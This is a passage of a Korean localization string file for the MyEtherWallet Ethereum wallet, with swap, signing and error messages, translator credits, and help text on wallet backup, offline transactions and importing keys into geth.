'노드 포트 ', NODE_CTA : '커스텀 노드 저장 또는 사용 ', /* Swap / Exchange */ SWAP_rates : "현재 시세 ", SWAP_init_1 : "환전하실 ", SWAP_init_2 : "에서 ", // "I want to swap my X ETH for X BTC" SWAP_init_CTA : "진행합니다! ", // or "Continue" SWAP_information : "당신의 정보 ", SWAP_send_amt : "전송량 ", SWAP_rec_amt : "수신량 ", SWAP_your_rate : "당신의 비율 ", SWAP_rec_add : "당신의 받는 주소 ", SWAP_start_CTA : "교환 시작 ", SWAP_ref_num : "참조 번호 ", SWAP_time : "남은 전송 시간 ", SWAP_elapsed : "전송 시간 경과 ", SWAP_progress_1 : "주문 개시 ", SWAP_progress_2 : "기다리는 중… : ", // Waiting for your BTC... SWAP_progress_3 : "수신 완료! ", // ETH Received! SWAP_progress_4 : "{{order Result.output,currency}} 전송하는 중 ", SWAP_progress_5 : "주문 완료 ", SWAP_order_CTA : "전송해주세요 : ", // Please send 1 ETH... SWAP_unlock : "ETH 또는 토큰을 이 페이지에서 바로 전송하기 위해 당신의 지갑 비밀번호를 해제해주세요. ", /* Sign Message */ MSG_message : '메세지 ', MSG_date : '날짜 ', MSG_signature : '서명 ', MSG_verify : '메세지 확인 ', MSG_info1 : '서명을 다른 날짜에 재사용하지 못하도록 현재의 날짜를 포함해주세요. ', MSG_info2 : '타인이 사용하지 못하도록 당신의 닉네임을 포함해주세요 ', MSG_info3 : '다른 용도로 사용되는 것을 막으려면 세부적인 내용을 메시지에 포함해주세요. ', /* View Wallet Details */ VIEWWALLET_Subtitle : '다른 버전의 개인 키를 다운로드하거나 종이 지갑 정보를 다시 인쇄할 수 있습니다. [계좌를 Geth/Mist로 가져오기](http://ethereum.stackexchange.com/questions/465/how-to-import-a-plain-private-key-into-geth/)를 진행할 때 필요합니다. 잔액을 확인하려면 [etherscan.io](http://etherscan.io/)과 같은 블록체인 조회 서비스를 사용하는 것을 권장합니다. ', VIEWWALLET_Subtitle_Short : '다른 버전의 개인 키를 다운로드하거나 종이 지갑 정보를 다시 인쇄 할 수 있습니다. ', VIEWWALLET_SuccessMsg : '성공했습니다! 지갑의 세부사항은 다음과 같습니다. ', VIEWWALLET_ShowPrivKey : '(보기) ', VIEWWALLET_HidePrivKey : '(숨기기) ', /* Chrome Extension */ CX_error_1 : '저장된 지갑이 없습니다. 지갑을 추가하려면 ["지갑 추가"](/cx-wallet.html#add-wallet) 버튼을 클릭해주세요! ', CX_quicksend : '빠른 전송 ', // 적절한 번역이 없다면, "보내기"를 사용하세요. ', /* Error Messages */ ERROR_0 : '올바른 금액을 입력해주세요. ', ERROR_1 : '비밀번호는 최소 9자 이상이어야 합니다. 더 강력한 비밀번호를 입력해주세요. ', ERROR_2 : '죄송합니다. 이러한 유형의 지갑 파일은 인식 할 수 없습니다. ', ERROR_3 : '올바른 지갑 파일이 아닙니다. ', ERROR_4 : '존재하지 않는 단위입니다. 다음과 같은 단위 중 하나를 사용해주세요. ', ERROR_5 : '잘못된 주소입니다. ', ERROR_6 : '잘못된 비밀번호입니다. ', ERROR_7 : '잘못된 수량입니다. ', ERROR_8 : '잘못된 가스 한도입니다. ', ERROR_9 : '잘못된 데이터입니다. ', ERROR_10 : '잘못된 가스 수량입니다. ', ERROR_11 : '잘못된 nonce 입니다. ', ERROR_12 : '잘못된 서명 트랜잭션입니다. ', ERROR_13 : '이미 같은 닉네임의 지갑이 존재합니다. ', ERROR_14 : '지갑을 찾을 수 없습니다. ', ERROR_15 : '이와 같은 ID 요청을 찾을 수 없거나 요청을 읽는 데 실패하였습니다. ', ERROR_16 : '같은 주소의 지갑이 이미 존재합니다. 지갑 페이지를 확인해주세요. ', ERROR_17 : '가스 비용을 지불하기 위해서는 적어도 **0.01ETH**가 필요합니다. ETH을 추가한 뒤 다시 실행해주세요. ', ERROR_18 : '모든 가스가 이 트랜잭션을 위해 사용됩니다. 이것은 이미 투표를 진행했거나 토론 기간이 종료되었기 때문입니다. ', ERROR_19 : '비정상 기호 ', ERROR_20 : '올바른 ERC-20 토큰이 아닙니다 ', ERROR_21 : '필요한 가스양을 추정할 수 없습니다. 충분한 자금이 계좌에 없거나 수신 측 컨트랙트에 오류가 있을 수 있습니다. 가스양을 변경한 후 사용해보세요. 전송시 에러 메세지가 반환됩니다. ', ERROR_22 : '올바른 노드 이름을 입력해주세요 ', ERROR_23 : '올바른 URL을 입력해주세요. HTTPS를 통해서 연결한다면, 노드도 HTTPS에 연결해야합니다. ', ERROR_24 : '올바른 포트를 입력해주세요. ', ERROR_25 : '올바른 체인 ID를 입력해주세요 ', ERROR_26 : '올바른 ABI를 입력해주세요 ', ERROR_27 : '최소량: 0.01. 최대량: ', ERROR_28 : '지갑에 액세스하기 위해서는 **Keystore 파일과 비밀번호** (또는 개인키)가 필요합니다. 별도로 저장하여 백업해주세요. 만약 그것을 저장하지 않으면 지갑을 복원할 방법이 없습니다. 자세한 내용은 [도움말 페이지](https://www.myetherwallet.com/#help)를 참고해주세요. ', ERROR_29 : '올바른 사용자와 패스워드를 입력해주세요 ', ERROR_30 : '올바른 ENS 이름을 입력해주세요 ', ERROR_31 : '잘못된 비밀 문구입니다. ', ERROR_32 : '노드에 연결할 수 없습니다. 새로고침 하거나 도움말을 확인해주세요. ', ERROR_33 : '입찰자의 주소와 잠금 해제된 지갑이 일치하지 않습니다. ', ERROR_34 : '해당 이름이 문자열의 이름과 일치하지 않습니다. ', SUCCESS_1 : '유효한 주소 ', SUCCESS_2 : '지갑이 성공적으로 복호화 되었습니다. ', SUCCESS_3 : '트랜잭션이 블록체인으로 공개됩니다. 트랜잭션 내역과 가스가 채굴되었는지 확인려면 클릭해주세요. 가스 또는 컨트랙트 실행 오류가 없는지 확인해주세요. TX ID : ', //'TX was broadcast to the blockchain. Click to see your transaction & verify it was mined and does not have any out of gas or contract execution errors. TX ID: ', // SUCCESS_4 : '지갑이 성공적으로 추가되었습니다. ', SUCCESS_5 : '파일이 선택되었습니다. ', SUCCESS_6 : '성공적으로 연결되었습니다. ', SUCCESS_7 : '메세지 서명이 확인되었습니다. ', WARN_Send_Link : '주소, 값, 가스, 데이터 필드 또는 트랜잭션 유형 (전송 모드)이 링크를 통해 도착했습니다. 전송하기 전에 정보를 변경할 수 있습니다. 시작하려면 지갑을 열어주세요. ', /* Geth Error Messages */ GETH_InvalidSender : '잘못된 전송지입니다. ', GETH_Nonce : 'Nonce가 너무 낮습니다. ', GETH_Cheap : '가스 가격이 너무 낮습니다. ', GETH_Balance : '잔액이 부족합니다. ', GETH_NonExistentAccount : '계좌가 존재 하지 않거나 잔액이 부족합니다. ', GETH_InsufficientFunds : '가스 * 가격 + 수량에 대한 자금이 부족합니다.', GETH_IntrinsicGas : '기본 가스가 부족합니다. ', GETH_GasLimit : '블록 가스 한도를 초과하였습니다. ', GETH_NegativeValue : '마이너스 값 ', /* Parity Error Messages */ PARITY_AlreadyImported : "이미 동일한 해시를 사용한 트랜잭션을 가져 왔습니다. ", PARITY_Old : "트랜잭션 Nonce가 너무 낮습니다. Nonce를 증가시키십시오. ", PARITY_TooCheapToReplace : "트랜잭션 수수료가 너무 낮습니다. 동일한 nonce를 가진 다른 트랜잭션이 대기열에 있습니다. 수수료를 늘리거나 nonce를 늘려보세요. ", PARITY_LimitReached : "대기열에 트랜잭션이 너무 많습니다. 트랜잭션이 한도를 초과하여 해당 트랜잭션이 제외되었습니다. 수수료를 늘려보세요. " , PARITY_InsufficientGasPrice : "트랜잭션 수수료가 너무 낮습니다. 노드의 최소 수수료 (최소 : {}, 획득 : {})를 충족시키지 못합니다. 수수료를 늘려보세요. ", PARITY_InsufficientBalance : "자금이 부족합니다. 트랜잭션을 전송하려는 계좌에 충분한 자금이 없습니다. 필요량: {}, 현재 : {} wei. ", PARITY_GasLimitExceeded : "트랜잭션 비용이 현재 가스 한도를 초과합니다. 제한 : {}, 획득 : {}. 가스 공급량을 줄이고 다시 시도해보세요. ", PARITY_InvalidGasLimit : "공급 된 가스가 한도를 초과했습니다. ", /* Tranlsation Info */ translate_version : '0.5 ', Translator_Desc : '번역에 기여해주신 분들 ', TranslatorName_1 : '[CoinKorea](https://www.myetherwallet.com/?gaslimit=21000&to=0x0080782b9A9A14f7871Bb765eF7041e784D03F00&value=1.0#send-transaction) · [kanghamin](https://www.myetherwallet.com/?gaslimit=21000&to=0x7B12655A5aada0b3c053C7ff5aa444Bd666A0163&value=1.0#send-transaction) · [maa](https://www.myetherwallet.com/?gaslimit=21000&to=0x14036e41ddb2bd408eaf91597e6dc5220f776ae0&value=1.0#send-transaction) ', TranslatorAddr_1 : '0x0080782b9A9A14f7871Bb765eF7041e784D03F00 ', /* Translator 1 : Insert Comments Here */ TranslatorName_2 : '· [Issac](https://www.myetherwallet.com/?gaslimit=21000&to=0x594a7773f4e062ccf644e8f122d5612b5f0db3b2&value=1.0#send-transaction) ', TranslatorAddr_2 : '0x594a7773f4e062ccf644e8f122d5612b5f0db3b2 ', /* Translator 2 : Insert Comments Here */ TranslatorName_3 : '· [coinmaker](https://www.myetherwallet.com/?gaslimit=21000&to=0x80B65285607BAbC4b60a7179A0fa8EB42232b9ad&value=1.0#send-transaction) ', TranslatorAddr_3 : '0x80B65285607BAbC4b60a7179A0fa8EB42232b9ad ', /* Translator 3 : Insert Comments Here */ TranslatorName_4 : '· [csjune](https://www.myetherwallet.com/?gaslimit=21000&to=0xfc465E0545c1024d04ceA2d6D154F20E7C67C66f&value=1.0#send-transaction) ', TranslatorAddr_4 : '0xfc465E0545c1024d04ceA2d6D154F20E7C67C66f ', /* Translator 4 : Insert Comments Here */ TranslatorName_5 : '· [sadfrog](https://www.myetherwallet.com/?gaslimit=21000&to=0x608c96865c3d1364ffc5137e5ac78b57e58714d4&value=1.0#send-transaction) ', TranslatorAddr_5 : '0x608c96865c3d1364ffc5137e5ac78b57e58714d4 ', /* Translator 5 : Insert Comments Here */ /* Help - Nothing after this point has to be translated. If you feel like being extra helpful, go for it. */ HELP_Warning : '**2015년 3월** 이전에 지갑을 만들었거나 저장소를 다운로드했다면, 지갑 &amp; 저장소의 새 버전을 확인하고 다운로드해주세요. 자세한 내용을 보려면 클릭해주세요. ', HELP_Desc : '잘못된 부분이나 다른 질문이 있으신가요? [우리에게 연락해주세요] (mailto : [email protected]), 당신의 질문에 답변하는 것 뿐만 아니라, 향후 사용자들에게 더 유용할 수 있도록 페이지를 업데이트할 것입니다. ', HELP_Remind_Title : '몇 가지 알림 ', HELP_Remind_Desc_1 : '**이더리움, MyEtherWallet.com & MyEtherWallet CX, 그리고 우리가 사용하는 JavaScript 라이브러리는 활발하게 개발되고 있습니다. ** 우리가 철저하게 테스트를 진행하여 수만 개의 지갑이 전 세계 사람들에 의해 성공적으로 만들어졌지만 예상치 못한 일이 발생하여 ETH를 잃을 가능성이 항상 존재합니다. 항상 조심해주세요. 만약 무슨 일이 발생한다면, 유감스럽지만 **우리는 잃어버린 이더리움에 대한 책임을 지지 않습니다.** ', HELP_Remind_Desc_2 : 'MyEtherWallet.com 과 MyEtherWallet CX는 웹 지갑이 아닙니다. 계정을 만들거나 우리에게 당신이 가진 이더리움을 주면 안 됩니다. 모든 데이터는 당신의 컴퓨터와 브라우저에 남아 있을 것입니다. 우리는 당신이 쉽게 당신의 정보를 만들고, 저장하고, 접근하고 블록체인과 상호 작용할 수 있도록 도울 것입니다. ', HELP_Remind_Desc_3 : '당신의 개인 키와 암호를 저장하지 않으면, 지갑에 액세스할 수 없게 될 뿐만 아니라, 지갑에 있는 자금에도 접근할 수 없게 됩니다. 개인 키와 암호를 컴퓨터뿐만 아니라 &ndash; 다양한 실제 위치(ex :인쇄, 메모 등...)에도 백업해야 합니다! ', HELP_0_Title : '0) 처음 사용합니다. 뭘 해야 하나요? ', HELP_0_Desc_1 : 'MyEtherWallet은 새로운 지갑을 생성할 수 있는 기능을 제공하므로 거래소에 이더리움을 두지 않고 직접 저장할 수 있습니다. 이 과정은 전적으로 당신의 컴퓨터에서 발생하고 우리의 서버에서 발생하지 않습니다. 따라서 새로운 지갑을 만들 때 **안전하게 백업’해야 합니다**. ', HELP_0_Desc_2 : '새로운 지갑 생성하기 ', HELP_0_Desc_3 : '지갑 백업하기 ', HELP_0_Desc_4 : '새로운 지갑에 대한 액세스 권한과 필요한 모든 정보를 올바르게 저장하였는지 확인해주세요. ', HELP_0_Desc_5 : '이더리움을 새로운 지갑으로 전송해보세요. ', HELP_1_Title : '1) 새로운 지갑을 어떻게 생성하나요? ', HELP_1_Desc_1 : '"지갑 생성" 페이지로 이동합니다. ', HELP_1_Desc_2 : '"지갑 추가" 페이지로 이동 & "새 지갑 생성"을 선택해주세요. ', HELP_1_Desc_3 : '안전을 위하여 강력한 비밀번호를 설정하고 비밀번호 분실을 대비하여 안전하게 백업해주세요. 송금 시에 이 비밀번호가 요구됩니다. ', HELP_1_Desc_4 : '"생성하기"를 클릭해주세요. ', HELP_1_Desc_5 : '지갑이 생성되었습니다. ', HELP_2a_Title : '2a) 어떻게 내 지갑을 저장/백업할 수 있나요? ', HELP_2a_Desc_1 : '항상 지갑을 USB 드라이브 또는 메모지와 같은 여러 위치에 백업해두어야 합니다. ', HELP_2a_Desc_2 : '주소를 저장해주세요. 주소는 자신만 확인할 수 있도록 보관하거나 다른 사람에게 공유할 수 있습니다. 주소를 공유하면 다른 사람이 해당 주소로 이더리움을 전송할 수 있습니다. ', HELP_2a_Desc_3 : '개인 키를 저장해주세요. 절대 타인과 공유하지 마세요. 개인 키는 지갑에 액세스하거나 이더리움을 전송하는 데 필요합니다! 개인 키에는 3가지 유형이 있습니다. ', HELP_2a_Desc_4 : '주소, 개인 키 버전 및 종이 지갑의 PDF 파일을 폴더에 보관하고 컴퓨터와 USB 드라이브에 저장하세요. ', HELP_2a_Desc_5 : '프린터가 있으면 지갑을 인쇄해주세요. 프린터가 없다면, 개인 키와 지갑 주소를 메모해주세요. 인쇄물 또는 메모를 컴퓨터와 USB와 분리된 안전한 위치에 보관해주세요. ', HELP_2a_Desc_6 : '하드 디스크, USB, 종이의 손상을 방지해야 한다는 것을 유념하세요. 또한, 보관 장소의 재난에 대비해주세요. (화재, 홍수 등) ', HELP_2b_Title : '2b) 어떻게 하면 MyEtherWallet을 이용해 안전하게 오프라인, 콜드 스토리지로 자산을 보관할 수 있나요? ', HELP_2b_Desc_1 : '다음을 참고 해주세요. [https://github.com/kvhnuke/etherwallet/releases/latest](https://github.com/kvhnuke/etherwallet/releases/latest). ', HELP_2b_Desc_2 : '"dist-vX.X.X.X.zip" 파일을 클릭합니다. ', HELP_2b_Desc_3 : 'zip 파일을 인터넷이 연결되지 않은 컴퓨터로 옮깁니다. ', HELP_2b_Desc_4 : '압축을 푼 후, ‘index.html’ 을 더블 클릭합니다. ', HELP_2b_Desc_5 : '강력한 비밀번호와 함께 지갑을 생성합니다. ', HELP_2b_Desc_6 : '지갑 주소를 저장합니다. 개인 키의 버전들을 저장합니다. 비밀번호를 영원히 기억할 자신이 없다면 저장합니다. ', HELP_2b_Desc_7 : '인쇄된 지갑과 USB를 여러 장소에 분산하여 보관합니다. ', HELP_2b_Desc_8 : '"지갑 정보 보기" 페이지에서 개인 키와 암호가 잘 작동하는지 확인해주세요. 저장해둔 지갑 주소가 동일한지 확인해주세요. ', HELP_3_Title : '3) 새로운 지갑에 대한 액세스 권한을 확인하려면 어떻게 해야 하나요? ', HELP_3_Desc_1 : '**새 지갑에 이더리움을 전송하기 전**에 지갑에 접근할 수 있는지 확인해야 합니다. ', HELP_3_Desc_2 : '"지갑 정보 보기" 페이지로 이동합니다. ', HELP_3_Desc_3 : 'MyEtherWallet.com 에서 "지갑 정보 보기" 페이지로 이동합니다. ', HELP_3_Desc_4 : '지갑 파일 선택 또는 개인 키를 사용하여 지갑을 잠금 해제합니다. ', HELP_3_Desc_5 : '지갑이 암호화되어 있다면, 팝업 창이 열립니다. 비밀번호를 입력합니다. ', HELP_3_Desc_6 : '"지갑 잠금 해제" 버튼을 클릭합니다. ', HELP_3_Desc_7 : '지갑 정보가 표시됩니다. 색색의 동그란 아이콘 옆에 있는 지갑 주소를 찾습니다. 아이콘은 지갑 주소를 시각적으로 나타냅니다. 지갑 주소가 지갑을 생성할 때 메모해두었던 주소와 일치하는지 확인해야 합니다. ', HELP_3_Desc_8 : '많은 양의 이더리움을 MyEtherWallet 으로 전송하기 전에, 소량의 이더리움을 전송해 보는 것을 권장합니다. 0.001 이더리움을 지갑으로 전송하고, 지갑을 열어 받은 이더리움을 확인하고, 다시 0.001 이더리움을 다른 주소로 전송하여 모든 과정이 잘 작동하는지 확인해주세요. ', HELP_4_Title : '4) 한 지갑에서 다른 지갑으로 이더리움을 어떻게 전송하나요? ', HELP_4_Desc_1 : '많은 양의 이더리움을 다른 지갑으로 전송하기 전에 소량의 이더리움을 전송하여 전송이 잘 되는지 확인해주세요. ', HELP_4_Desc_2 : '"이더리움 & 토큰 전송하기" 페이지로 이동합니다. ', HELP_4_Desc_3 : '지갑 파일 또는 개인 키를 사용하여 지갑을 잠금 해제합니다. ', HELP_4_Desc_4 : '지갑이 암호화되어있다면, 팝업 창이 열립니다. 비밀번호를 입력합니다. ', HELP_4_Desc_5 : '"지갑 잠금 해제" 버튼을 클릭합니다. ', HELP_4_Desc_6 : '"받는 주소" 영역에 이더리움을 전송할 주소를 입력합니다. ', HELP_4_Desc_7 : '전송할 수량을 입력합니다. 모든 잔액을 전송하려면 "모든 잔액 전송" 을 클릭합니다. ', HELP_4_Desc_9 : '"트랜잭션 생성하기"를 클릭합니다. ', HELP_4_Desc_10 : '몇 가지 영역이 추가로 나타납니다. 당신의 브라우저에서 트랜잭션을 생성합니다. ', HELP_4_Desc_11 : '바로 아래에 있는 "트랜잭션 전송하기"를 클릭합니다. ', HELP_4_Desc_12 : '팝업창 열리면, 전송하고자 하는 수량이 정확한지 확인해주세요. 그 후, "네, 맞습니다! 전송합니다." 버튼을 누릅니다. ', HELP_4_Desc_13 : '트랜잭션이 제출되고, TXID가 표시 됩니다. TXID를 클릭하여 블록체인에 등록되었는지 확인할 수 있습니다. ', HELP_4CX_Title : '4) 이더리움을 MyEtherWallet CX를 사용하여 전송하는 방법이 궁급합니다. ', HELP_4CX_Desc_1 : '우선 지갑을 추가해야 합니다. 그 후에, 2가지 방법이 있습니다. "빠른 전송" 또는 "이더리움 & 토큰 전송" 페이지입니다. ', HELP_4CX_Desc_2 : '빠른 전송 ', HELP_4CX_Desc_3 : 'Chrome 확장 프로그램 아이콘을 클릭합니다. ', HELP_4CX_Desc_4 : '‘빠른 전송’ 버튼을 클릭합니다. ', HELP_4CX_Desc_5 : '보내는 곳(지갑)을 선택합니다. ', HELP_4CX_Desc_6 : '"받는 주소" 영역에 전송한 이더리움을 받게 될 주소를 입력합니다. ', HELP_4CX_Desc_7 : '전송할 수량을 입력합니다. 모든 잔액을 전송하려면 "모든 잔액 전송" 을 클릭합니다. ', HELP_4CX_Desc_8 : '"트랜잭션 전송하기"를 클릭합니다. ', HELP_4CX_Desc_9 : '받는 주소와 양이 정확한지 확인해주세요. ', HELP_4CX_Desc_10 : '지갑 주소를 입력합니다. ', HELP_4CX_Desc_11 : '"트랜잭션 전송하기"를 클릭합니다." ', HELP_4CX_Desc_12 : '"이더리움 & 토큰 전송하기" 페이지를 사용하는 방법', HELP_5_Title : '5) MyEtherWallet.com 을 오프라인/로컬에서 사용할 수 있나요? ', HELP_5_Desc_1 : 'MyEtherWallet을 GitHub 서버가 아닌 본인의 컴퓨터에서 이용할 수 있습니다. 오프라인 상태에서 지갑을 생성할 수 있으며, "오프라인 트랜잭션" 페이지에서 트랜잭션을 전송할 수 있습니다. ', HELP_5_Desc_7 : 'MyEtherWallet.com 은 이제 본인의 컴퓨터에서 구동됩니다. ', HELP_5_Desc_8 : '아직 사용이 미숙할 때는, ‘index.html’ 뿐만 아니라 웹사이트를 가동하는 전체 폴더를 수정하지 말아 주세요. ', HELP_5_Desc_9 : '우리는 MyEtherWallet.com을 주기적으로 업데이트하고 있으므로 당신이 정기적으로 저장소의 업데이트된 버전을 사용하는 것을 권장합니다. ', HELP_5CX_Title : '5) Chrome 스토어 대신 저장소에서 이 확장 프로그램을 설치하려면 어떻게 해야 하나요? ', HELP_5CX_Desc_2 : '"chrome-extension-vX.X.X.X.zip"을 누르고, 압축을 풀어주세요. ', HELP_5CX_Desc_3 : '구글 Chrome에서 설정(우측 상단 메뉴)에 있습니다. ', HELP_5CX_Desc_4 : '"확장기능" 버튼을 클릭해주세요. ', HELP_5CX_Desc_5 : '페이지 상단에 있는 개발자 모드 버튼에 체크해주세요. ', HELP_5CX_Desc_6 : '압축 해제된 확장 프로그램 로드 버튼을 클릭해주세요. ', HELP_5CX_Desc_7 : '조금 전 다운로드해서 압축을 푼 폴더로 가서 선택해주세요. ', HELP_5CX_Desc_8 : '여기까지 하셨다면 마이이더월렛은 당신의 Chrome 확장 프로그램 창에 나타나서 Chrome 확장 프로그램 바에 생기게 됩니다. ', HELP_7_Title : '7) 어떻게 토큰 전송하기&커스텀 토큰 추가할 수 있나요? ', HELP_7_Desc_0 : '[Ethplorer.io](https://ethplorer.io/)에서 토큰을 탐색하여 토큰의 decimals를 찾을 수 있습니다. ', HELP_7_Desc_1 : '이더리움 & 토큰 전송 페이지로 이동합니다. ', HELP_7_Desc_2 : '지갑을 잠금 해제 합니다. ', HELP_7_Desc_3 : '보낼 주소 입력란에 전송하고 싶은 주소를 입력합니다. ', HELP_7_Desc_4 : '전송하고 싶은 금액을 입력합니다. ', HELP_7_Desc_5 : '전송하고 싶은 토큰을 선택합니다. ', HELP_7_Desc_6 : '원하는 토큰이 보이지 않는다면 ', HELP_7_Desc_7 : '커스텀’ 버튼을 클릭합니다. ', HELP_7_Desc_8 : '주소와 이름, 토큰의 decimals를 입력합니다. 이것은 토큰의 개발자에 의해서 제공되고 또한 당신이 Mist에서 "모니터링할 토큰 추가하기"를 할 때 필요합니다. ', HELP_7_Desc_9 : '‘저장’ 버튼을 클릭합니다. ', HELP_7_Desc_10 : '이제 토큰을 전송할 수 있게 됐을 뿐만 아니라 사이드 바에서 잔액도 확인하실 수 있습니다. ', HELP_7_Desc_11 : '"트랜잭션 생성" 버튼을 클릭합니다. ', HELP_7_Desc_12 : '2가지 이상의 영역이 나타날 것입니다. 이것이 트랜잭션을 생성하고 있는 것은 당신의 브라우저입니다. ', HELP_7_Desc_13 : '그 아래에 있는 파란색 ‘트랜잭션 전송하기’ 버튼을 클릭합니다. ', HELP_7_Desc_14 : '팝업창이 열리면 보내는 양과 주소가 맞는지 확인해주세요. 그리고 "네 맞습니다! 전송합니다." 버튼을 클릭합니다. ', HELP_7_Desc_15 : '트랜잭션이 전송되면 TXID가 나타날 것입니다. 해당 TXID를 클릭하여 블록체인에서 볼 수 있습니다. ', HELP_8_Title : '8) MyEtherWallet 서버가 다운되면 어떻게 되나요? ', HELP_8_Desc_1 : 'MyEtherWallet은 웹 지갑이 아닙니다. 서버에는 로그인은 물론 어떠한 것도 저장되지 않습니다. MyEtherWallet은 단지 블록체인에 접근 하게 해주는 도구입니다. ', HELP_8_Desc_2 : '만약 MyEtherWallet.com 이 다운된다면, 다른 대안 도구 (geth 또는 Ethereum Wallet / Mist 등)을 사용해야 합니다. MyEtherWallet 에서 이더리움을 꺼내야 할 필요는 없습니다. 이더리움들은 MyEtherWallet.com 을 통해서 생성된 지갑 내에 존재합니다. ', HELP_8_Desc_3 : '암호화되지 않은 개인 키와 암호화된 Geth/Mist 형식의 파일은 쉽게 geth / 이더리움 지갑 / Mist에서 불러올 수 있습니다. 아래의 질문 #12를 확인해주세요. ', HELP_8_Desc_4 : '또한, MyEtherWallet 이 다운 될 가능성은 희박합니다. 우리는 어떠한 정보도 저장하지 않기 때문에 비용이 들지 않습니다. 도메인이 다운되더라도, 항상 공개적으로 [https://github.com/kvhnuke/etherwallet](https://github.com/kvhnuke/etherwallet/tree/gh-pages)을 통해 로컬 지갑을 시작할 수 있습니다. ZIP 파일을 다운 받아주세요. ', HELP_8CX_Title : '8) MyEtherWallet CX가 사라지면 어떻게 되나요? ', HELP_8CX_Desc_1 : '우선, 모든 정보는 MyEtherWallet 서버가 아닌 사용자의 컴퓨터에 저장됩니다. 오해할 수도 있지만, Chrome 확장 프로그램 화면은 우리의 서버에서 불러온 것이 아닙니다. 전부 사용자의 컴퓨터에 저장 되어있습니다. ', HELP_8CX_Desc_2 : '즉, **매우 중요** MyEtherWallet CX 로 새로 만든 지갑 정보는 모두 백업해 두어야 합니다. 만약 컴퓨터에 문제가 생기거나 Chrome 확장 프로그램에 문제가 생겨도 백업해둔 파일로 지갑에 접근할 수 있습니다. #2a에서 지갑을 어떻게 백업 하는 지 확인할 수 있습니다. ', HELP_8CX_Desc_3 : '어떤 이유로 MyEtherWallet CX 가 Chrome 스토어에서 사라져도, Github 에서 소스를 다운 받아 수동으로 사용할 수 있습니다. 위의 #5를 확인해주세요. ', HELP_9_Title : '9) "이더리움 & 토큰 전송하기" 페이지는 오프라인인가요? ', HELP_9_Desc_1 : '아닙니다. 현재 가스 가격, 본인의 계정 정보, 그리고 트랜잭션 ("전송하기")를 나타내기 위해서는 인터넷이 필요합니다. 그러나 이것은 서명된 트랜잭션만 보냅니다. 개인 키는 안전하게 귀하와 함께 있습니다. 또한, 오프라인 트랜잭션 페이지를 제공하여 개인 키가 항상 오프라인 / 인터넷이 연결되지 않은 컴퓨터에 있는지 확인할 수 있습니다. ', HELP_10_Title : '10) 오프라인 트랜잭션은 어떻게 생성하나요? ', HELP_10_Desc_1 : '온라인 컴퓨터에서 "오프라인 트랜잭션" 페이지로 이동합니다. ', HELP_10_Desc_2 : '"보낸 사람 주소"를 입력하십시오. 이 주소는 TO가 아니라 FROM으로 보내는 주소입니다. 이것은 nonce 및 가스 가격을 생성합니다. ', HELP_10_Desc_3 : '오프라인 컴퓨터에서, "받는 곳"과 전송하고자 하는 "금액" 을 입력합니다. ', HELP_10_Desc_4 : '온라인 컴퓨터 1단계에서 표시된 "가스 가격"을 입력합니다. ', HELP_10_Desc_5 : '온라인 컴퓨터 1단계에서 표시된 "NONCE"를 입력합니다. ', HELP_10_Desc_6 : '21000 가스는 기본 설정값입니다. 트랜잭션을 전송하거나 데이터를 더할 때, 사용 가스는 다를 수 있습니다. 사용되지 않은 가스는 환급됩니다. ', HELP_10_Desc_7 : '가스를 늘리고 싶다면 희망 가스양을 입력해주세요. 기본값인 21000 가스보다 높은 양을 입력해야 합니다. 모든 데이터는 HEX 포맷입니다. ', HELP_10_Desc_8 : '지갑을 열기 위해 지갑 파일 또는 개인 키를 선택합니다. ', HELP_10_Desc_9 : '"서명된 트랜잭션 생성" 버튼을 클릭해주세요. ', HELP_10_Desc_10 : '이 버튼 아래의 데이터 영역은 서명된 트랜잭션으로 채워집니다. 이것을 복사하여 온라인 컴퓨터로 옮깁니다. ', HELP_10_Desc_11 : '온라인 컴퓨터에서 3단계의 텍스트 필드에 서명된 트랜잭션을 붙여넣고 전송하기를 클릭해주세요. 그 후에 트랜잭션이 공개됩니다. ', HELP_12_Title : '12) MyEtherWallet으로 만든 지갑을 geth / 이더리움 지갑 / Mist로 가져오려면 어떻게 해야 하나요? ', HELP_12_Desc_1 : 'MyEtherWallet v2 +의 Geth / Mist JSON 파일 사용하기… ', HELP_12_Desc_2 : '"지갑 정보 보기" 페이지로 이동합니다. ', HELP_12_Desc_3 : '**암호화된** 개인 키 또는 JSON 파일을 사용하여 지갑을 잠금 해제합니다. ', HELP_12_Desc_4 : '"내 지갑"페이지로 이동합니다. ', HELP_12_Desc_5 : 'Mist로 가져올 지갑을 선택하고 "보기" 아이콘을 클릭한 다음 비밀번호를 입력하고 지갑에 액세스합니다.', HELP_12_Desc_6 : '"JSON 파일 다운로드 - Geth / Mist 형식 (암호화됨)" 부문을 찾아주세요. 아래의 "다운로드" 버튼을 클릭합니다. 이제 키 저장소 파일이 생겼습니다. ', HELP_12_Desc_7 : '이더리움 어플리케이션을 실행합니다. ', HELP_12_Desc_8 : '메뉴 바에서 "계정들" > "백업" > "계정" 으로 이동합니다. ', HELP_12_Desc_9 : '그러면 키 저장소 폴더가 열립니다. 방금 다운로드 한 파일 ("UTC - 2016-04-14 ........ /")을 사용자의 keystore 폴더에 복사합니다. ', HELP_12_Desc_10 : '사용자의 계정이 바로 "계정" 아래에 나타나야합니다. ', HELP_12_Desc_11 : '사용자의 암호화되지 않은 개인 키를 사용합니다… ', HELP_12_Desc_12 : '아직 암호화된 키가 없다면 ‘지갑 세부사항 보기’ 페이지로 갑니다. ', HELP_12_Desc_13 : '당신의 지갑 파일을 선택하거나 당신의 개인 키를 입력/붙여넣기 하여 지갑의 잠금을 해제합니다. ', HELP_12_Desc_14 : '당신의 개인 키를 복사합니다. (암호화되지 않은) ', HELP_12_Desc_15 : '맥을 사용하고 있다면 ', HELP_12_Desc_15b : 'PC를 사용하고 있다면 ', HELP_12_Desc_16 : 'Text 편집을 열어 개인 키를 붙여넣기 합니다. ', HELP_12_Desc_17 : '메뉴로 가서 "포맷" -> "일반 텍스트 만들기"를 선택합니다. ', HELP_12_Desc_18 : '이 파일을 당신 컴퓨터에 "nothing_special_delete_me.txt"같은 제목으로 저장해주세요 저장 대화 상자에 "UTF-8"과 "확장자가 제공되지 않은 경우 .txt 사용"이 표시되어있는지 확인합니다. ', HELP_12_Desc_19 : '터미널을 열고 다음 커맨드를 실행합니다. "geth account import ~/Desktop/nothing_special_delete_me.txt" ', HELP_12_Desc_20 : '실행하면 새 비밀번호를 입력하라는 메시지가 나타납니다. 이것은 트랜잭션을 전송할 때마다 사용할 비밀번호이므로 절대 잃어버리지 말아 주세요. ', HELP_12_Desc_21 : '가져오기가 성공하면 